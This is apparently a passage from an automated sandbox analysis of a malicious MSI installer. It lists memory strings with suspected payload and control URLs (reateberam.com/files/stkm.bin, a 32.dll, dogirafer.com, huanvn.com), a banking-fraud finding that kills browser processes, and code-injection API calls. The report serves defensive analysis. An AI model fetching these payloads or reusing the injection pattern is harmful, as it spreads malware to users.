Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113818155.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/=
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.binbm
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460913739.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139833595.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113784503.000000000CB22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/32.dll
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42
Source: explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661
Source: explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80
Source: explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/v
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2056295568.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		9_2_0B8D4948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		9_2_0B8D4948

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D326 NtProtectVirtualMemory,	5_3_0000023CDA68D326
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D2B6 NtAllocateVirtualMemory,	5_3_0000023CDA68D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4871B0 NtClose,	5_2_0000023CDA4871B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA498149 NtSetContextThread,	5_2_0000023CDA498149
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA481600 NtClose,RtlExitUserThread,	5_2_0000023CDA481600
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA497A50 NtSetContextThread,	5_2_0000023CDA497A50
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4817B0 NtClose,NtClose,	5_2_0000023CDA4817B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4740 NtFreeVirtualMemory,	5_2_0000023CDA4B4740
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B3F40 NtAllocateVirtualMemory,	5_2_0000023CDA4B3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4360 NtCreateThreadEx,	5_2_0000023CDA4B4360
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4BE0 NtProtectVirtualMemory,	5_2_0000023CDA4B4BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4FF0 NtQueueApcThread,	5_2_0000023CDA4B4FF0
Source: C:\Windows\explorer.exe	Code function: 9_2_0137C704 NtDelayExecution,	9_2_0137C704
Source: C:\Windows\explorer.exe	Code function: 9_2_0137B388 NtAllocateVirtualMemory,	9_2_0137B388
Source: C:\Windows\explorer.exe	Code function: 9_2_013782B4 NtFreeVirtualMemory,	9_2_013782B4
Source: C:\Windows\explorer.exe	Code function: 9_2_01380130 NtAllocateVirtualMemory,	9_2_01380130
Source: C:\Windows\explorer.exe	Code function: 9_2_013781C8 NtWriteFile,	9_2_013781C8
Source: C:\Windows\explorer.exe	Code function: 9_2_01378240 NtClose,	9_2_01378240
Source: C:\Windows\explorer.exe	Code function: 9_2_013780B8 RtlInitUnicodeString,NtCreateFile,	9_2_013780B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D248C NtFreeVirtualMemory,	9_2_0B8D248C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D241C NtAllocateVirtualMemory,	9_2_0B8D241C

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA906B7C: CreateFileW,DeviceIoControl,CloseHandle,

5_2_00007FFDFA906B7C

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8ADA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,

5_2_00007FFDFA8ADA48

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\424593.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{998A301A-3216-4DC9-93E2-7045B0436D77}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4808.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI468D.tmp

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C16A50	3_2_00C16A50
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4F032	3_2_00C4F032
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3C2CA	3_2_00C3C2CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C492A9	3_2_00C492A9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3E270	3_2_00C3E270
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C484BD	3_2_00C484BD
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A587	3_2_00C3A587
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C1C870	3_2_00C1C870
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A915	3_2_00C3A915
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C34920	3_2_00C34920
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C40A48	3_2_00C40A48
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C19CC0	3_2_00C19CC0
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C45D6D	3_2_00C45D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97BB1C	5_2_00007FFDFA97BB1C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA989AF0	5_2_00007FFDFA989AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AFA78	5_2_00007FFDFA8AFA78
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9C5C	5_2_00007FFDFA8B9C5C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AC878	5_2_00007FFDFA8AC878
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C79F8	5_2_00007FFDFA8C79F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DEA05	5_2_00007FFDFA8DEA05
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BBA28	5_2_00007FFDFA8BBA28
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA994A20	5_2_00007FFDFA994A20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B69A0	5_2_00007FFDFA8B69A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AAF20	5_2_00007FFDFA8AAF20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90	5_2_00007FFDFA922E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C9E64	5_2_00007FFDFA8C9E64
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8F1E90	5_2_00007FFDFA8F1E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA906E84	5_2_00007FFDFA906E84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CBEDC	5_2_00007FFDFA8CBEDC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA98D04C	5_2_00007FFDFA98D04C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA990FAC	5_2_00007FFDFA990FAC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ABCB8	5_2_00007FFDFA8ABCB8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ADCBC	5_2_00007FFDFA8ADCBC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AEDE0	5_2_00007FFDFA8AEDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9D8C	5_2_00007FFDFA8B9D8C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D530C	5_2_00007FFDFA8D530C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B5320	5_2_00007FFDFA8B5320
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA998330	5_2_00007FFDFA998330
